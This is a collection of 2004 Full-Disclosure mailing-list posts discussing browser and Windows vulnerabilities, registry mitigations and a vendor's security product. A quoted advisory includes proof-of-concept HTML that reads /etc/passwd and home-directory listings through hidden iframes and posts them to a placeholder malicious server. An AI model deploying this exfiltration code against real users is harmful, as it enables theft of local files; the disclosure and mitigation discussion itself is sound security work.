RE: [Full-Disclosure] Disclosure of local file content in Mozilla Firefox and Opera
This is not a vulnerability, it is expected behavior. Mozilla shares the same zone design as IE which means that a file from the local file zone can read any other file from the local file zone. You cannot use this approach to read a local file from another zone such as the Internet zone. From the Internet zone, you can also only read the content of files from the same zone, same protocol and same domain. I agree that Mozilla has implemented quite a lot of proprietary IE extensions which it should have not done, however reading the innerHTML of an element through document.all does not circumvent the traditional zone security checks already in place. Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x4207AEE9 B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Giovanni Delvecchio Sent: Monday, December 06, 2004 3:24 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Disclosure of local file content in Mozilla Firefox and Opera Disclosure of local file content in Mozilla Firefox and Opera Note: I don't know if it could be considered really a security problem, anyway i'll try to explain my ideas. Sorry for my bad english. Author: Giovanni Delvecchio Applications affected: - Firefox 1.0 - Mozilla 1.7 - Opera 7.54 (*) ( maybe also previous versions ) Tested versions: - Firefox 1.0 on Linux and Windows - Mozilla 1.7 on Windows - Opera 7.51,..7.54 on Linux Note: The content of the following text could be applied also to other browsers, i have checked just Mozilla, Firefox,Opera and Microsoft Internet Explorer. Microsoft Internet Explorer seems not to be affected. Description: === A possible problem exist in some browsers where a frame can gain access to attributes of another frame or iframe. An application of this bug? could be the possibility to disclose local directory structure. Moreover ther is is a possibility for a remote users to get the content of target users's local files. This can be achieved by using of the method .innerHTML , such method isn't standard but it's supported from the most broswers like Opera and Mozila Firefox. With Opera, i have noted that is possible read the content of local file just if they have *.htm or *.hml extension. PoC: === The following PoCs are refered to linux versions of Firefox and Opera, but they can be applied also to Windows versions. Read a local file by inner.HTML method: HTML BODY onLoad=ReadFileContent() iframe name=local_file src=file:///etc/passwd height=0 width=0/iframe form name=module method=post action=http://malicious_server/grab.php; ENCTYPE=text/plain input name=content type=hidden size=300 /form script function ReadFileContent(){ alert(local_file.document.all(0).innerHTML); document.module.content.value+=local_file.document.all(0).innerHTML; //send content to malicious_server document.module.submit(); } /script /body /html (*) it works with Firefox with Opera it works just a file has .htm or html extension. --- Enum /home directory structure: html body onLoad= for(i=0;ilocal_files.document.links.length;i++) {document.module.content.value+=local_files.document.links.item(i);} alert(document.module.content.value); //send list_files at malicious_server document.module.submit(); form name=module method=post action=http://malicious_server/grab.php; ENCTYPE=text/plain input name=content type=hidden size=300 /form iframe name=local_files src=file:///home/ height=0 width=0/iframe /body /html --- Impact: == A malicious server could : - obtain content of /home/ directory ( or c:\Document and Setting\ for windows system ) and so know a set of usernames present on system target. - know if a particolar program is installed on target system for a succesive attack. - Read confidential file content - Read browser's cache In opera it is located in ~/.opera/cache4, instead in Mozilla Firefox it's in /.mozilla/firefox/$RANDOM-STRING.default/Cache. Since is possible enum the directory structure , a malicious user could easily know the path to firefox's cache Anyway it cannot be exploited directly by a remote site, but only if the page is opened from a local path ( file://localpath/code.htm), since the iframe belongs to a local domain. Note: with Internet Explorer these PoCs doesn't work even in local. Possible method of remote exploitation
[Full-Disclosure] RE: How to Break Windows XP SP2 + Internet Explorer 6 SP2
I successfully reproduced this exploit on a fully patched XPSP2 installation and can verify that malware.htm is planted locally after which HTML Help is used to launch it and circumvent the XPSP2 browser security improvements, compromising the system. However, this exploit did not work on any systems with Qwik-Fix Pro installed, from Windows 95 to Windows XP Service Pack 2. A free Home edition and a trial Corporate edition is available for download at http://www.pivx.com/qwikfixDownload.asp Before you can successfully use any Drag'n'Drop technique or script shortcuts to plant a file on the local system you first need to be able to reference local content. If you cannot reference local contents or directories from the Internet zone then you cannot retrieve the window handle that is necessary for any Drag'n'Drop exploits or any cross-domain scripting exploits. IE6SP1 initially blocked all direct references to the FILE:// and RES:// protocols which I demonstrated how to circumvent through the OBJECT element. This was quickly patched in the next cumulative security update and thereby blocked the traditional cross-domain scripting exploits. XPSP2 went further and tightened down the Local Machine Zone with the recommendations PivX Labs made public in late 2003 so that even if you could find a way to reference local content and subsequently inject scripting through a cross-domain vulnerability you would not be able to accomplish anything. This LMZ lockdown has a per-process exception list in which HTML Help is included. When the LMZ is locked down attackers have to find alternative attack vectors, of which the Drag'n'Drop vulnerability is a prime example. When IE renders an IMG element it gives priority to the SRC attribute but when IE drops an IMG element on an arbitrary window it gives priority to the DYNSRC attribute. If you are able to reference any local content you can therefore drop the DYNSRC attribute of the IMG element on the window with local content and thereby plant a file on the file system in a known location. The browser security improvements in XPSP2 does not include further restrictions on referencing local content which is why the Drag'n'Drop exploits to this date affect fully patched XPSP2 systems. Qwik-Fix Pro restricts local content referencing through a number of means of which one is responsible for protecting against this exploit: In order for http-equiv's exploit to work the ceegar.html file uses the AnchorClick behavior to open C:\WINDOWS\PCHealth\ in a named window which is then used as a drop target for the DYNSRC pointing to the malwarez file. When any behavior in IE tries to list a local directory it uses the Shell.Explorer ActiveX object, an object which has no justification of use inside the browser but which is heavily used by Windows Explorer itself. Setting the Kill Bit on the Shell.Explorer ActiveX object prevents IE from referencing local directories in a window object, whether it's through AnchorClick behavior or some other approach that we discover tomorrow. The GUID for Shell.Explorer is {8856F961-340A-11D0-A96B-00C04FD705A2} and Knowledge Base article 240797 (http://support.microsoft.com/?kbid=240797 ) explains how the process works. PivX Labs released a freely available registry fix that sets the Kill Bit on Shell.Explorer almost 2 months ago which can be downloaded from http://www.pivx.com/research/freefixes/neutershellexplorer.reg For clarity, here are the file contents: === neutershellexplorer.reg === Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}] Compatibility Flags=dword:0400 === neutershellexplorer.reg === PivX Labs has covered this topic several times before on the Unpatched mailing list which receives advance notification of our security research, including several Win95-XPSP2 vulnerabilities that will be released in the interim future. For more information or to subscribe you can visit http://unpatched.pivxlabs.com Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x4207AEE9 B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: Windows NTBugtraq Mailing List [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Wednesday, October 20, 2004 5:36 AM To: [EMAIL PROTECTED] Subject: How to Break Windows XP SP2 + Internet Explorer 6 SP2 Snip http://www.ntbugtraq.com/default.asp?pid=36sid=1A2=ind0410L=ntbugtraq F=PS=P=10781 Snip http://tinyurl.com/4xeww ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE: How to Break Windows XP SP2 + Internet Explorer 6 SP2
From: Maarten [mailto:[EMAIL PROTECTED] http://www.pivx.com/qwikfixDownload.asp No it is not, at least not before you fix your broken downloadform. Hitting submit does nothing at all. (You're not seriously telling us that you need MSIE to download qwikfix, or do you ?!) I just filled out the form and submitted without problems in IE, Mozilla, Firefox and Opera. Judging from your user-agent you are using KDE which most likely has problems with ' being used both for the HTML attribute and JS strings inside the onsubmit event handler. What version of KHTML are you using? I've asked our webmaster to correct this immediately and I apologize for the bad impression this must have given you. In the mean time, please use the direct Home edition download page at http://www.pivx.com/qwikfixDownloadPage.asp a disappointed potential customer Again, my apologies. Regards Thor Larholm ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: AOL Instant Messenger Away Message Buffer Overflow Vulnerability
Deleting the HKEY_CLASSES_ROOT\aim registry key is not a permanent mitigation but a per-session change that has to be implemented every time AOL Instant Messenger is instantiated. The reason for this is that if the HKCR\aim key is missing when AIM is launched AIM will simply recreate the key and thus the URL protocol. If you want to mitigate against any use of the AIM protocol the most viable approach is to implement a URL protocol handler to either filter or disregard the data. You can read more about asynchronous pluggable protocols in IE at http://msdn.microsoft.com/workshop/networking/pluggable/overview/overvie w.asp If you want to simply disregard any data sent to the aim: URL protocol you can implement the about: URL protocol handler which is located at HKEY_CLASSES_ROOT\PROTOCOLS\Handler\about\CLSID This REG_SZ value contains the data {3050F406-98B5-11CF-BB82-00AA00BDCE0B} which points at MSHTML.DLL and ensures that any data sent through the protocol will not be parsed by its intended application. AIM doesn't have a URL protocol handler of its own so you will have to create the keys yourself. This would be equivelant to the following .reg file: === neuteraimurl.reg === Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\PROTOCOLS\Handler\about] CLSID={3050F406-98B5-11CF-BB82-00AA00BDCE0B} === neuteraimurl.reg === If you implement this registry change the aim URL protocol handler will be neutered. There are a lot of potentially dangerous URL protocols on any Windows system (e.g., take a look at callto: or ldap:). You can locate all the URL protocols on your system by searching through your registry for a REG_SZ value called URL Protocol which is located under HKCR\*\URL Protocol. As an example, you can neuther the Shell protocol in a similar manner. End-node security solutions can help mitigate the risk of URL protocols by filtering data and implementing the lacking input validation. Qwik-Fix Pro is currently having several fixes developed that protect against exploitation of not only the aim URL protocol but other potentially malicious URL protocols as well. You can download a copy of Qwik-Fix Pro at http://www.pivx.com/qwikfix/ Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x4207AEE9 B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tuesday, August 10, 2004 1:12 PM To: [EMAIL PROTECTED] Subject: AOL Instant Messenger Away Message Buffer Overflow Vulnerability THIS WAS NOT DISCOVERED BY ME. Source: Secunia (http://secunia.com/advisories/12198/) Description: Ryan McGeehan has reported a vulnerability in AOL Instant Messenger (AIM), which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the handling of Away messages and can be exploited to cause a stack-based buffer overflow by supplying an overly long Away message (about 1024 bytes). A malicious website can exploit this via the aim: URI handler by passing an overly long argument to the goaway?message parameter. Successful exploitation allows execution of arbitrary code on a user's system when e.g. a malicious website is visited with certain browsers. The vulnerability has been confirmed in version 5.5.3595. Other versions may also be affected. NOTE: Various other issues were also reported, where a large amount of resources can be consumed on a user's system. Solution: The vendor has contacted Secunia and recommends that users install a beta version, which addresses the vulnerability, or remove support for the aim: URI handler by deleting the HKEY_CLASSES_ROOT\aim registry key. A new non-beta version is forthcoming. Provided and/or discovered by: The vulnerability was discovered independently by the following around the same time: 1) Ryan McGeehan and Kevin Benes, TheBillyGoatCurse.com. 2) Matt Murphy ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: AOL Instant Messenger Away Message Buffer Overflow Vulnerability
As several of you have pointed out, the neuteraimurl.reg file should of course have said aim instead of about, as in === neuteraimurl.reg === Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\PROTOCOLS\Handler\aim] CLSID={3050F406-98B5-11CF-BB82-00AA00BDCE0B} === neuteraimurl.reg === You can find a copy of this file at http://www.pivx.com/research/freefixes/neuteraimurl.reg Feel free to implement this registry fix as you see fit. Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x4207AEE9 B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: Thor Larholm Sent: Wednesday, August 11, 2004 10:25 AM To: '[EMAIL PROTECTED]'; '[EMAIL PROTECTED]' Subject: RE: AOL Instant Messenger Away Message Buffer Overflow Vulnerability Deleting the HKEY_CLASSES_ROOT\aim registry key is not a permanent mitigation but a per-session change that has to be implemented every time AOL Instant Messenger is instantiated. The reason for this is that if the HKCR\aim key is missing when AIM is launched AIM will simply recreate the key and thus the URL protocol. If you want to mitigate against any use of the AIM protocol the most viable approach is to implement a URL protocol handler to either filter or disregard the data. You can read more about asynchronous pluggable protocols in IE at http://msdn.microsoft.com/workshop/networking/pluggable/overview/overvie w.asp If you want to simply disregard any data sent to the aim: URL protocol you can implement the about: URL protocol handler which is located at HKEY_CLASSES_ROOT\PROTOCOLS\Handler\about\CLSID This REG_SZ value contains the data {3050F406-98B5-11CF-BB82-00AA00BDCE0B} which points at MSHTML.DLL and ensures that any data sent through the protocol will not be parsed by its intended application. AIM doesn't have a URL protocol handler of its own so you will have to create the keys yourself. This would be equivelant to the following .reg file: === neuteraimurl.reg === Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\PROTOCOLS\Handler\about] CLSID={3050F406-98B5-11CF-BB82-00AA00BDCE0B} === neuteraimurl.reg === If you implement this registry change the aim URL protocol handler will be neutered. There are a lot of potentially dangerous URL protocols on any Windows system (e.g., take a look at callto: or ldap:). You can locate all the URL protocols on your system by searching through your registry for a REG_SZ value called URL Protocol which is located under HKCR\*\URL Protocol. As an example, you can neuther the Shell protocol in a similar manner. End-node security solutions can help mitigate the risk of URL protocols by filtering data and implementing the lacking input validation. Qwik-Fix Pro is currently having several fixes developed that protect against exploitation of not only the aim URL protocol but other potentially malicious URL protocols as well. You can download a copy of Qwik-Fix Pro at http://www.pivx.com/qwikfix/ Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x4207AEE9 B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tuesday, August 10, 2004 1:12 PM To: [EMAIL PROTECTED] Subject: AOL Instant Messenger Away Message Buffer Overflow Vulnerability THIS WAS NOT DISCOVERED BY ME. Source: Secunia (http://secunia.com/advisories/12198/) Description: Ryan McGeehan has reported a vulnerability in AOL Instant Messenger (AIM), which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the handling of Away messages and can be exploited to cause a stack-based buffer overflow by supplying an overly long Away message (about 1024 bytes). A malicious website can exploit this via the aim: URI handler by passing an overly long argument to the goaway?message parameter. Successful exploitation allows execution of arbitrary code on a user's system when e.g. a malicious website is visited with certain browsers. The vulnerability has been confirmed in version 5.5.3595. Other versions may also be affected. NOTE: Various other issues were also reported, where a large amount of resources can be consumed on a user's system. Solution: The vendor has contacted Secunia and recommends that users install a beta version, which addresses the vulnerability, or remove support for the aim: URI handler by deleting
RE: [Full-Disclosure] mi2g - fud, lies and libel
From: Eric Paynter On Tue, July 20, 2004 4:17 pm, [EMAIL PROTECTED] said: This is a blatant lie from Matai and mi2g, nothing more. Or maybe it's also a hoax? http://www.mi2g.com/cgi/mi2g/press/200704.php ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: RE: HijackClick 3
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] The codeBase attribute has allowed command execution from the My Computer zone without interruption since this misfeature was discovered by Dildog. It was not automatically re-enabled with yesterdays patches so there must have been some other problem with your systems that has made it untestable for you during the years. If you need any easily reproduceable POC for codeBase you can use the example from GM#001-IE [1]. Put a fresh Windows XP image on VMWare or VirtualPC, apply all the patches up to June/July 2003 and you will see that the POC still works. You can even combine codebase with any of the recent click hijacking vulnerabilities from Paul and you can see that beneath the new Information Bar in SP2 the same codebase functionality is present (by the way, that bar is not present in the Intranet or Trusted Sites zones). [1] http://www.greymagic.com/security/advisories/gm001-ie/ We have by no means been trying to hide the download location of Qwik-Fix Pro from anyone. We are in the middle of a data center move and have been readily handing out internal download locations and instructions, delivering guidance and support to anyone who has inquired. However, I cannot locate a download request from you in our support center. Qwik-Fix Pro is currently in Release Candidate 1 with a planned General Availability for August. We most certainly appreciate the tremendous beta feedback we have received over these last months, it has helped us tremendously. It is not apparent from your post whether you have been testing the long ago discontinued Qwik-Fix Beta v0.60 or the later Qwik-Fix Pro, but the description of your problems sounds as if no changes are even applied to your system. If you could give us more details about your system (OS, SP level) I would love to reproduce this. You are not mentioning any of the URL protocol handler lockdowns, MIME type mitigations or icon handler restrictions that RC1 contains so I am guestimating that you have been testing an older beta version. Feel very welcome to request an RC1 download from our site. I am also positive that your concerns about the updating logic will be answered fully once you look at the multiple layers of encryption and digital signatures based on 2048 bit RSA keys that combined mitigate against the impact of any imaginable MITM attack - these are all covered in the complete forensics analysis of Qwik-Fix Pro that will be released in the near future. We are trying to far exceed the industry expectations on the level of openness and are eagerly playing cards with our hands open. It is encouraging that you have enough faith in Windows XP Service Pack 2 to hint that it will solve all the security issues in Internet Explorer. I will have to disagree on that sentiment as vulnerabilities have been discovered that even work on a fully patched XPSP2RC2. Much as you, I am looking forward to the improvements of the final service pack. Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x4207AEE9 B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: MSIE Similar Method Name Redirection Cross Site/Zone Scripting Vulnerability
Nice find :) The problem does not rely on similarly named methods, rather it relies on the trust access checks that IE performs on function calls in disparate windows. When you try to alert each of the assign methods in your example their core toString methods are called which return a static string, however this is not used for comparison as each assign method still has their own unique internal ID. Instead, IE tries to determine whether the function call is safe based on the level of trust it has to the object that the method resides on. Your approach enables a range of method caching vulnerabilities by circumventing the object security check. This can be demonstrated by creating a cached reference to the location.assign method from the first window on the second windows location object, not just on the location.assign method but also on the location.replace method and the non-existant location.whatever property. I have added such a demo at http://www.pivx.com/research/2004/7/PaulsimilarMethodNameRedirection/tes t2.html Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x4207AEE9 B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: Paul [mailto:[EMAIL PROTECTED] Sent: Sunday, July 11, 2004 8:34 AM To: [EMAIL PROTECTED] Subject: MSIE Similar Method Name Redirection Cross Site/Zone Scripting Vulnerability Note: This vulnerability and many more can be found at http://www.greyhats.cjb.net SimliarMethodNameRedir Automatic Remote Compromise [Tested] IEXPLORE.EXE file version 6.0.2800.1106 MSHTML.DLL file version 6.00.2800.1400 Microsoft Windows XP sp2 [Discussion] At first I thought this vulnerability had something to do with method caching. It doesn't. It has to do with the security check that internet explorer has in place. Apparently, if a function is redirected to a function with the same name, it can be called without security restrictions. If you want to see what I mean, try this: lt;scriptgt; var var1=location.assign; alert(Assign function of the current window:\n+var1); var w=window.open(about:blank,_blank); var var2=w.location.assign; var w=alert(Assign function of the new window:\n+var2); w.close(); lt;/scriptgt; You should get two alerts describing the assign() function as being function assign(){ [Native code] } Notice both functions appear to be the same. My guess is that Internet Explorer checks the two function names and (maybe) the function code. If it matches, Internet Explorer marks the function as safe. It doesn't, however, take into account cross-window function calls. That's why SimilarMethodNameRedir works. How bad is this problem? Critical. With minimal effort, a malicious website owner could install viruses or spyware on the visitor's computer. Because theoretically this should work with every function, the only way that I can think of to fix the problem is to rewrite the whole function security check that internet explorer has in place. The best way to prevent this vulnerability is to either disable active scripting or switch to a different browser ;). The example goes to google.com and executes javascript that displays a messagebox with the location.href and the document.cookie attributes of the window object. [Example] http://freehost07.websamba.com/greyhats/similarmethodnameredir.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Unchecked buffer in mstask.dll
In MS02-022 the only workaround Microsoft lists is this: Do not open or save .job files that you receive from untrusted sources. As you mentioned, this vulnerability can be triggered automatically without user interaction and without opening or saving .job files by navigating to an explorer folder that contains a malicious .job file, which can be done either locally, remotely on a webpage or inside an HTML email. The primary cause of this automated exploitation is the concept of dynamic icon handlers. For an introduction to these, read the Creating Icon Handlers article at http://msdn.microsoft.com/library/en-us/shellcc/platform/shell/programme rsguide/shell_int/shell_int_extending/extensionhandlers/iconhandlers.asp (short: http://tinyurl.com/3uanu ) To quote: An icon handler is a type of Shell extension handler that allows you to dynamically assign icons to the members of a file class. Every time a file from the class is displayed, the Shell queries the handler for the appropriate icon. For instance, an icon handler can assign different icons to different members of the class, or vary the icon based on the current state of the file. To summarize, every time you open a directory in an Explorer window, Explorer will examine each and every filetype in that directory and determine whether each filetype has an associated icon handler. When you look at .job files you get a reference to the JobObject entry in HKLM\Software\Classes\JobObject which in turn has a shellex\IconHandler entry that points at {DD2110F0-9EEF-11cf-8D8E-00AA0060F5BF} whose InProcServer32 is mstask.dll that is automatically launched without user interaction. You can completely mitigate against automated exploitation of this vulnerability simply by deleting or renaming the following registry entry: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JobObject\shellex\IconHandler The only noticable difference is that your .job files will not have as pretty of an icon. I'm positive that following your advisory we will find other vulnerabilities involving dynamic icon handlers. It's quite easy to mitigate against this potential impact simply by removing all dynamic icon handlers and I'll be testing the cosmetic impact of this in the days to come. Removing the automated attack vector means that the only way to have this exploited is to convince the user to launch Task Scheduler and import your malicious .job file. As Brett mentions, Qwik-Fix Pro protects against automated remote exploitation of this vulnerability and you can get a free copy at http://qwik-fix.net/. Microsoft should update the MS02-022 bulletin to reflect that automated exploitation is possible. Currently, the only listed affected software is Windows 2000 but I had no problems reproducing this on Windows XP as well. Since there is no patch available for Windows XP to fix this vulnerability the only workaround is to disable the dynamic icon handler for JobObject files, as described above. Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x4207AEE9 B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: Brett Moore [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 13, 2004 10:51 PM To: [EMAIL PROTECTED] Com Subject: Unchecked buffer in mstask.dll = Unchecked buffer in mstask.dll = = MS Bulletin posted: = http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx = = Affected Software: = Microsoft Windows 2000 Service Pack 4 = Microsoft Windows XP, Microsoft Windows XP Service Pack 1 = = Public disclosure on July 14, 2004 When thinking about buffer overflow vulnerabilities, a file can sometimes be as harmful as a packet. Even though past security issues have taught us that it is unwise to use an unvalidated text string containing a file name or directory, that is what happened here. By creating a .job file with a large to be executed field the stack can be overwritten allowing for remote command execution, when the file is parsed by mstask.dll. == Description == It appears that both explorer.exe and iexplore.exe will parse a .job file when showing folder listings. Upon the parsing of the .job file, the large to be executed field is passed to wcscpy without doing any bounds checking. Using explorer the viewing of a folder containing the .job is enough to cause the buffer overflow to occur. The file can be hosted locally or on a remote network share. A remote attack would require the end user to visit the folder/share containing the exploit file. Using Internet Explorer the viewing of a folder containing the .job file through
[Full-Disclosure] RE: Registry Fix For Variant of Scob
Setting the kill bit on the Shell.Application ActiveX object, or any other ActiveX, is a system wide configuration change. This is also the reason for the incompatibility issues you are mentioning, but there is no reason to kill the bird to secure the nest. The problem here is not the ADODB.Stream or Shell.Application objects, the problem is the insecure My Computer zone in Internet Explorer. Your registry fix will have adverse functionality regressions on any Windows administrator that use WSH when there is no reason for this. ActiveX objects are used in many hosts of which IE is just one, others include Jscript, VBScript, HTML Applications and WSH, all of which run outside of the browser and require executional privileges to launch in the first place. The prerequisite for even having privileges enough to launch the Shell.Application ActiveX object inside IE is to have script running in the My Computer zone. Locking down this zone will completely prevent this exploit, without introduing functionality regressions in other parts of Windows. In fact, if you had implemented the registry changes I described back in early September 2003 you would have been safe against all the command execution vulnerabilities that have subsequently been discovered - including ADODB.Stream and Shell.Application who are themselves just minor components of a larger exploit prerequisite. http://www.securityfocus.com/archive/1/346174/2003-11-30/2003-12-06/0 I am sure that tomorrow, next week and next month we will find even more ways to exploit insecure zone privileges in IE. You can either try to fix the root cause once or you can try to treat each new symptom as it is discovered. There is no need to hurridly introduce last-minute system wide functionality regressions such as killbitting Shell.Application, all you need to do is lock down the My Computer zone in IE properly. We implemented this in Qwik-Fix last September and have since then not had to worry about exploits that target these design principles in IE. Instead, we have been able to focus our efforts on securing other parts of Windows as opposed to scramble to cope up with each new exploit from jelmer or http-equiv. You can get a free copy of Qwik-Fix Pro at http://qwik-fix.net All software is inherently insecure, the difference is in how you treat that insecurity. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX) Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: Drew Copley [mailto:[EMAIL PROTECTED] Sent: Friday, July 02, 2004 2:33 PM To: Windows NTBugtraq Mailing List; [EMAIL PROTECTED] Subject: Registry Fix For Variant of Scob About the same time Jelmer found the adodb bug, http-equiv found a similiar issue with the object Shell.Application. This issue has also been unfixed for the past ten months. Unfortunately, Microsoft has not taken the hint and not fixed this issue either. Jelmer has noted this and made a proof of concept exploit page here: http://62.131.86.111/security/idiots/malware2k/installer.htm The below registry file will protect you from this exploit by kill biting Shell.Application variant. --- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{13709620-C279-11CE-A49E-44455354}] Compatibility Flags=dword:0400 I will be updating our free fix download here: http://www.eeye.com/html/research/alerts/AL20040610.html This will break some hta scripts that might be used for management. It may cause some incompatibility issues with some programs. Shell.Application is commonly used by administrators for administration of systems via Visual basic script or WSH. It may have other uses. It is kind of Microsoft's answer to shell script -- though not as happy as batch. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: RE: SUPER SPOOF DELUXE Re: [Full-Disclosure] Microsoft and Security
Both you and I know perfectly well that Windows Update serves a different page for non-IE browsers, and that that page does not contain any frames. You should focus on the facts instead of letting your hatred for Microsoft overwhelm you. Since you have trouble reproducing a very simple example I have instead put this example online: http://www.jscript.dk/2004/7/subframe/ Open the page. Click the first button called Open window. Click the second button called Load page. See that the page from geocities.com is now loaded inside the subframe on jscript.dk. As you can see, this is perfectly reproduceable in both IE, Mozilla, Firefox and Opera. This is of course provided that they allow popups in the first place, but as I mentioned in my previous posts you can acomplish the same with inline frames instead of a new browser window. To make doubly sure, I even downloaded fresh copies of Firefox 0.9.1 (worked fine in 'Safe Mode' as well) and Opera 7.51. Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Thursday, July 01, 2004 1:09 PM To: Thor Larholm; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: RE: SUPER SPOOF DELUXE Re: [Full-Disclosure] Microsoft and Security Yes of course. Two tiny problems though: 1. your little scriplet doesn't work for me. I get: 'W.frames.2.location' is null or not an object 2. If as you claim this is standard practice then there is something wrong with these browsers as it apparently does not work on them: The following browsers are not affected: * Mozilla Firefox 0.9 for Windows * Mozilla Firefox 0.9.1 for Windows * Mozilla 1.7 for Windows * Mozilla 1.7 for Linux http://secunia.com/advisories/11978/ Perhaps someone who really knows will enlighten us all. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: SUPER SPOOF DELUXE Re: [Full-Disclosure] Microsoft and Security
